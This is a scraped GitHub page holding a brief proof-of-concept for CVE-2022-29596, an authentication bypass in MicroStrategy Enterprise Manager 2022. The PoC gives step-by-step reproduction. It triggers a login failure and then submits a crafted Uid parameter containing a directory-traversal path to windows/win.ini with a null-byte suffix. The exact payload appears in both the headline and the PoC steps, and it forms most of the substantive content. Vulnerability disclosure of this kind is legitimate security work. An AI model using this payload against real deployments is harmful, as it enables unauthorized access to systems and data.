Headline
CVE-2022-29596: MicroStrategy-Enterprise-Manager-2022/poc at main · haxpunk1337/MicroStrategy-Enterprise-Manager-2022
MicroStrategy Enterprise Manager 2022 allows authentication bypass by triggering a login failure and then entering the Uid=/…/…/…/…/…/…/…/…/…/…/…/windows/win.ini%00.jpg&Pwd=any_password&ConnMode=1&3054=Login substring for directory traversal.
Permalink
main
Switch branches/tags
MicroStrategy-Enterprise-Manager-2022/poc****
Go to file
Go to file
Copy path
Copy permalink
haxpunk1337 Update poc
Latest commit fc99390 Apr 23, 2022
History
1 contributor
Users who have contributed to this file
13 lines (9 sloc) 321 Bytes
Raw Blame
- Open with Desktop
- View raw
- Copy raw contents
- View blame
Product: MicroStrategy Enterprise Manager - Version 2022
Steps to reproduce
Visit: https://localhost/MicroStrategy/servlet/mstrWeb
Now
give any username and password
Got Login Failure
now manipulate UID VALUE AS
Uid=/…/…/…/…/…/…/…/…/…/…/…/windows/win.ini%00.jpg&Pwd=aa&ConnMode=1&3054=Login
login bypassed
Related news
MicroStrategy Enterprise Manager 2022 allows authentication bypass by triggering a login failure and then entering the Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login substring for directory traversal.